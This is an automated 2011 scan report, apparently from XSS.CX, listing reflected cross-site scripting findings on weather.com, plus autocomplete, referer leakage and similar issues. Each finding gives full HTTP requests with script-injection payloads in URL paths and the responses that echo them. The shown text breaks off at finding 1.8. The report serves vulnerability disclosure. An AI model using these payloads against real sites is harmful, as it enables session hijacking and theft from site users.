XSS, DORK, weather.com, Cross Site Scripting, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Thu Mar 24 12:46:13 CDT 2011.



1. Cross-site scripting (reflected)

1.1. http://www.weather.com/pagelet/apps/traffic/ [REST URL parameter 1]

1.2. http://www.weather.com/pagelet/apps/traffic/ [REST URL parameter 1]

1.3. http://www.weather.com/pagelet/apps/traffic/ [REST URL parameter 2]

1.4. http://www.weather.com/pagelet/apps/traffic/ [REST URL parameter 3]

1.5. http://www.weather.com/pagelet/bc/56967 [REST URL parameter 1]

1.6. http://www.weather.com/pagelet/bc/56967 [REST URL parameter 1]

1.7. http://www.weather.com/pagelet/bc/56967 [REST URL parameter 2]

1.8. http://www.weather.com/pagelet/bc/59233 [REST URL parameter 1]

1.9. http://www.weather.com/pagelet/bc/59233 [REST URL parameter 1]

1.10. http://www.weather.com/pagelet/bc/59233 [REST URL parameter 2]

1.11. http://www.weather.com/pagelet/bc/62264 [REST URL parameter 1]

1.12. http://www.weather.com/pagelet/bc/62264 [REST URL parameter 1]

1.13. http://www.weather.com/pagelet/bc/62264 [REST URL parameter 2]

1.14. http://www.weather.com/pagelet/loc/ [REST URL parameter 1]

1.15. http://www.weather.com/pagelet/loc/ [REST URL parameter 1]

1.16. http://www.weather.com/pagelet/loc/ [REST URL parameter 2]

1.17. http://www.weather.com/pagelet/metrics/ [REST URL parameter 1]

1.18. http://www.weather.com/pagelet/metrics/ [REST URL parameter 1]

1.19. http://www.weather.com/pagelet/metrics/ [REST URL parameter 2]

1.20. http://www.weather.com/pagelet/metrics/ [cb parameter]

1.21. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 1]

1.22. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 1]

1.23. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]

1.24. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]

1.25. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]

1.26. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 3]

1.27. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 3]

1.28. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 3]

1.29. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 1]

1.30. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 1]

1.31. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]

1.32. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]

1.33. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]

1.34. http://www.weather.com/weather-apps/ [REST URL parameter 1]

1.35. http://www.weather.com/weather-apps/ [REST URL parameter 1]

2. Password field with autocomplete enabled

2.1. http://www.weather.com/activities/driving/rushhour/

2.2. http://www.weather.com/services/desktop.html

2.3. http://www.weather.com/weather/health/beauty/

3. Source code disclosure

3.1. http://www.weather.com/activities/driving/rushhour/

3.2. http://www.weather.com/mobile/swap/send_sms_to_phone.html

3.3. http://www.weather.com/services/desktop.html

4. Cross-domain Referer leakage

4.1. http://www.weather.com/common/a21/makeRequest-2_3.html

4.2. http://www.weather.com/mobile/swap/send_sms_to_phone.html

4.3. http://www.weather.com/pagelet/apps/traffic/

4.4. http://www.weather.com/pagelet/bc/56967

4.5. http://www.weather.com/pagelet/bc/59233

4.6. http://www.weather.com/pagelet/bc/62264

5. Cross-domain script include

5.1. http://www.weather.com/

5.2. http://www.weather.com/activities/driving/rushhour/

5.3. http://www.weather.com/common/a21/makeRequest-2_3.html

5.4. http://www.weather.com/mobile/swap/send_sms_to_phone.html

5.5. http://www.weather.com/pagelet/apps/traffic/

5.6. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico

5.7. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico

5.8. http://www.weather.com/services/desktop.html

5.9. http://www.weather.com/weather-apps/

5.10. http://www.weather.com/weather/health/beauty/

6. Private IP addresses disclosed

6.1. http://www.weather.com/activities/driving/rushhour/

6.2. http://www.weather.com/mobile/swap/send_sms_to_phone.html

6.3. http://www.weather.com/services/desktop.html

6.4. http://www.weather.com/weather/health/beauty/

6.5. http://www.weather.com/weather/health/beauty/

7. Content type incorrectly stated

7.1. http://www.weather.com/pagelet/loc/

7.2. http://www.weather.com/pagelet/metrics/



1. Cross-site scripting (reflected)
There are 35 instances of this issue:


1.1. http://www.weather.com/pagelet/apps/traffic/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/apps/traffic/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dea46"><script>alert(1)</script>7740e17c9d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /pageletdea46"><script>alert(1)</script>7740e17c9d7/apps/traffic/?sub HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967?
Origin: http://www.weather.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780
Content-Length: 0

Response

HTTP/1.1 200 OK
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:41:15 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii3x04
X-Varnish: 624701992
Date: Thu, 24 Mar 2011 17:40:45 GMT
Connection: keep-alive
Content-Length: 159969

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="canonical" href="http://www.weather.com/pageletdea46"><script>alert(1)</script>7740e17c9d7/apps/traffic/" />
...[SNIP]...

1.2. http://www.weather.com/pagelet/apps/traffic/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/apps/traffic/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60609"-alert(1)-"07f39498de7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /pagelet60609"-alert(1)-"07f39498de7/apps/traffic/?sub HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967?
Origin: http://www.weather.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780
Content-Length: 0

Response

HTTP/1.1 200 OK
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:41:21 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x06
X-Varnish: 1510931970
Date: Thu, 24 Mar 2011 17:40:51 GMT
Connection: keep-alive
Content-Length: 159886

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
tch(/beta/)) {
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "62287",
pageURL: "/pagelet60609"-alert(1)-"07f39498de7/apps/traffic/",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/
...[SNIP]...

1.3. http://www.weather.com/pagelet/apps/traffic/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/apps/traffic/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16a65"-alert(1)-"f0591b460e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /pagelet/apps16a65"-alert(1)-"f0591b460e3/traffic/?sub HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967?
Origin: http://www.weather.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780
Content-Length: 0

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:45:55 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x02
X-Varnish: 1156436827
Date: Thu, 24 Mar 2011 17:40:55 GMT
Connection: keep-alive
Content-Length: 108354

<!DOCTYPE HTML>


<html>
<head>
<title>Page Not Found</title>


<link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet">

...[SNIP]...
beta/)) {
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "60990",
pageURL: "/pagelet/apps16a65"-alert(1)-"f0591b460e3/traffic/",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011"
...[SNIP]...

1.4. http://www.weather.com/pagelet/apps/traffic/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/apps/traffic/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9696c"-alert(1)-"545c7e9406c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /pagelet/apps/traffic9696c"-alert(1)-"545c7e9406c/?sub HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967?
Origin: http://www.weather.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780
Content-Length: 0

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:46:00 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x03
X-Varnish: 1510934940
Date: Thu, 24 Mar 2011 17:41:00 GMT
Connection: keep-alive
Content-Length: 108353

<!DOCTYPE HTML>


<html>
<head>
<title>Page Not Found</title>


<link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet">

...[SNIP]...
{
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "60990",
pageURL: "/pagelet/apps/traffic9696c"-alert(1)-"545c7e9406c/",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011",

...[SNIP]...

1.5. http://www.weather.com/pagelet/bc/56967 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/bc/56967

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b51f6"><script>alert(1)</script>1529b7c1906 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pageletb51f6"><script>alert(1)</script>1529b7c1906/bc/56967? HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/activities/driving/rushhour/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fv=3; fromStr=; s_pers=%20s_nr%3D1300988005201%7C1303580005201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.a=1300988007219; RMID=c245359a4d8b7f55

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:35:56 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x04
X-Varnish: 1156332345
Date: Thu, 24 Mar 2011 17:35:26 GMT
Connection: keep-alive
Content-Length: 159912

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="canonical" href="http://www.weather.com/pageletb51f6"><script>alert(1)</script>1529b7c1906/bc/56967" />
...[SNIP]...

1.6. http://www.weather.com/pagelet/bc/56967 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/bc/56967

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cd82"-alert(1)-"370523ec97 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82"-alert(1)-"370523ec97/bc/56967? HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/activities/driving/rushhour/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fv=3; fromStr=; s_pers=%20s_nr%3D1300988005201%7C1303580005201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.a=1300988007219; RMID=c245359a4d8b7f55

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:36:01 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x07
X-Varnish: 2184623889
Date: Thu, 24 Mar 2011 17:35:31 GMT
Connection: keep-alive
Content-Length: 159760

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
tch(/beta/)) {
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "62287",
pageURL: "/pagelet8cd82"-alert(1)-"370523ec97/bc/56967",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011"
...[SNIP]...

1.7. http://www.weather.com/pagelet/bc/56967 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/bc/56967

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85c3d"-alert(1)-"a5d5445c482 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet/bc85c3d"-alert(1)-"a5d5445c482/56967? HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/activities/driving/rushhour/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fv=3; fromStr=; s_pers=%20s_nr%3D1300988005201%7C1303580005201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.a=1300988007219; RMID=c245359a4d8b7f55

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:40:36 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x07
X-Varnish: 1096913262
Date: Thu, 24 Mar 2011 17:35:36 GMT
Connection: keep-alive
Content-Length: 108349

<!DOCTYPE HTML>


<html>
<head>
<title>Page Not Found</title>


<link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet">

...[SNIP]...
(/beta/)) {
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "60990",
pageURL: "/pagelet/bc85c3d"-alert(1)-"a5d5445c482/56967",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011",

...[SNIP]...

1.8. http://www.weather.com/pagelet/bc/59233 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/bc/59233

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0323"><script>alert(1)</script>8da94951a16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pageletd0323"><script>alert(1)</script>8da94951a16/bc/59233? HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/services/desktop.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
